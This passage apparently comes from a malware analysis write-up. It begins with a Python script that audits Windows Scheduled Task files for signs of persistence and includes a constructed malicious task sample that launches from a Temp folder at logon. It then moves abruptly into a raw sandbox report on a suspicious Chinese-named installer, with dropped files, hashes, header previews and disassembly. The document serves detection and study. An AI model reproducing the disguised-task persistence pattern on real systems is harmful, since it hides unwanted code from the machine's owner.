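NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Locations a genuine Microsoft task does not launch its action from.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def _text(node, path: str) -> str:
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def audit_task(xml_text: str) -> dict:
    """Return the task URI, author and the reasons it looks like persistence (empty list if none)."""
    root = ET.fromstring(xml_text)
    uri = _text(root, "t:RegistrationInfo/t:URI")
    author = _text(root, "t:RegistrationInfo/t:Author")
    flags = []
    # Genuine Microsoft tasks are registered under \Microsoft\...; a Microsoft author on a
    # top-level URI means the RegistrationInfo block was copied from a system task.
    if "microsoft" in author.lower() and not uri.lower().startswith("\\microsoft\\"):
        flags.append("Microsoft author on non-Microsoft URI")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        flags.append("runs at logon")
    if _text(root, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        flags.append("requests HighestAvailable run level")
    if _text(root, "t:Settings/t:AllowHardTerminate").lower() == "false":
        flags.append("AllowHardTerminate=false")
    for exec_el in root.findall("t:Actions/t:Exec", NS):
        cmd = _text(exec_el, "t:Command")
        if any(d in cmd.lower() for d in USER_WRITABLE):
            flags.append(f"executes from user-writable path: {cmd}")
    return {"uri": uri, "author": author, "flags": flags}


def audit_tasks_dir(tasks_dir: str) -> list:
    """Walk a Tasks folder (e.g. C:\\Windows\\System32\\Tasks) and return only the flagged tasks."""
    hits = []
    for dirpath, _, files in os.walk(tasks_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read()
                # On-disk task files are usually UTF-16 with a BOM; fall back to UTF-8.
                text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8")
                result = audit_task(text)
            except (OSError, ET.ParseError, UnicodeDecodeError):
                continue
            if result["flags"]:
                result["path"] = path
                hits.append(result)
    return hits


# Constructed from the visible fields of the dropped task; <Actions> is hypothetical.
DROPPED_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\\kafanbbs</URI>
  </RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled><UserId>user</UserId></LogonTrigger></Triggers>
  <Principals><Principal id="System"><UserId>user</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="System">
    <Exec><Command>C:\\Users\\user\\AppData\\Local\\Temp\\example.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign task in the style of a Microsoft system task.
BENIGN_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\\Microsoft\\Windows\\Example\\Cleanup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><AllowHardTerminate>true</AllowHardTerminate></Settings>
  <Actions Context="LocalSystem"><Exec><Command>%SystemRoot%\\System32\\cleanmgr.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for hit in audit_tasks_dir(sys.argv[1]):
            print(hit["path"], hit["flags"])
    else:
        for label, xml in (("dropped", DROPPED_TASK), ("benign", BENIGN_TASK)):
            print(label, audit_task(xml)["flags"])
```

Run it with no arguments to see the two constructed samples scored, or pass the Tasks directory of a mounted disk image to list only flagged tasks. The URI check is the strongest single signal here: Windows does not register its own tasks at the root of the task store, so "Microsoft Corporation" as author on `\kafanbbs` is copied metadata, not provenance.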
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1628158735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllulvh2th:NllUE
                                      MD5:1C6FEFD3AEFA5BA7595E7FC2E4284A86
                                      SHA1:1061961FD8D9427258B32E58594747A9009930B7
                                      SHA-256:AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
                                      SHA-512:03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
                                      Malicious:false
                                      Preview:@...e.................................~..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530549308235048
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530549308235048
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):406
                                      Entropy (8bit):5.117520345541057
                                      Encrypted:false
                                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                      MD5:9200058492BCA8F9D88B4877F842C148
                                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                      SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                      Malicious:false
                                      Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.92104230937537
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 98.04%
                                      • Inno Setup installer (109748/4) 1.08%
                                      • InstallShield setup (43055/19) 0.42%
                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      File name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File size:5'695'204 bytes
                                      MD5:b7289fd08cd04c771fd7c9b06477601a
                                      SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
                                      SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
                                      SHA512:3fa1db6989481a59d2a4c645f15f743c943e575e6ceba5eec0ddbe5bce4e394a10b1f83132385f350a139aecdbac4e78cf0d09346e46599dad7e92478071dd62
                                      SSDEEP:98304:XwREQQxJMpnJwpVM+bJr2CsBdh/vRXIXm25Kz4j2dMwZgW:ldJmngtrg/G26XcF
                                      TLSH:F9461213F2CBE03DE05E0B3B06B2A25494FB6A616526AD578AECB4ECCF351501D3E647
                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                      Icon Hash:0c0c2d33ceec80aa
                                      Entrypoint:0x4a83bc
                                      Entrypoint Section:.itext
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:1
                                      File Version Major:6
                                      File Version Minor:1
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:1
                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      add esp, FFFFFFA4h
                                      push ebx
                                      push esi
                                      push edi
                                      xor eax, eax
                                      mov dword ptr [ebp-3Ch], eax
                                      mov dword ptr [ebp-40h], eax
                                      mov dword ptr [ebp-5Ch], eax
                                      mov dword ptr [ebp-30h], eax
                                      mov dword ptr [ebp-38h], eax
                                      mov dword ptr [ebp-34h], eax
                                      mov dword ptr [ebp-2Ch], eax
                                      mov dword ptr [ebp-28h], eax
                                      mov dword ptr [ebp-14h], eax
                                      mov eax, 004A2EBCh
                                      call 00007F95307472F5h
                                      xor eax, eax
                                      push ebp
                                      push 004A8AC1h
                                      push dword ptr fs:[eax]
                                      mov dword ptr fs:[eax], esp
                                      xor edx, edx
                                      push ebp
                                      push 004A8A7Bh
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      mov eax, dword ptr [004B0634h]
                                      call 00007F95307D8C7Bh
                                      call 00007F95307D87CEh
                                      lea edx, dword ptr [ebp-14h]
                                      xor eax, eax
                                      call 00007F95307D34A8h
                                      mov edx, dword ptr [ebp-14h]
                                      mov eax, 004B41F4h
                                      call 00007F95307413A3h
                                      push 00000002h
                                      push 00000000h
                                      push 00000001h
                                      mov ecx, dword ptr [004B41F4h]
                                      mov dl, 01h
                                      mov eax, dword ptr [0049CD14h]
                                      call 00007F95307D47D3h
                                      mov dword ptr [004B41F8h], eax
                                      xor edx, edx
                                      push ebp
                                      push 004A8A27h
                                      push dword ptr fs:[edx]
                                      mov dword ptr fs:[edx], esp
                                      call 00007F95307D8D03h
                                      mov dword ptr [004B4200h], eax
                                      mov eax, dword ptr [004B4200h]
                                      cmp dword ptr [eax+0Ch], 01h
                                      jne 00007F95307DF9EAh
                                      mov eax, dword ptr [004B4200h]
                                      mov edx, 00000028h
                                      call 00007F95307D50C8h
                                      mov edx, dword ptr [004B4200h]
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0xcb000 | 0x11000 | 0x11000 | 9d61959cbf275c6bf6376c85f2d2fef4 | False | 0.18784466911764705 | data | 3.7213394898806054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                      RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
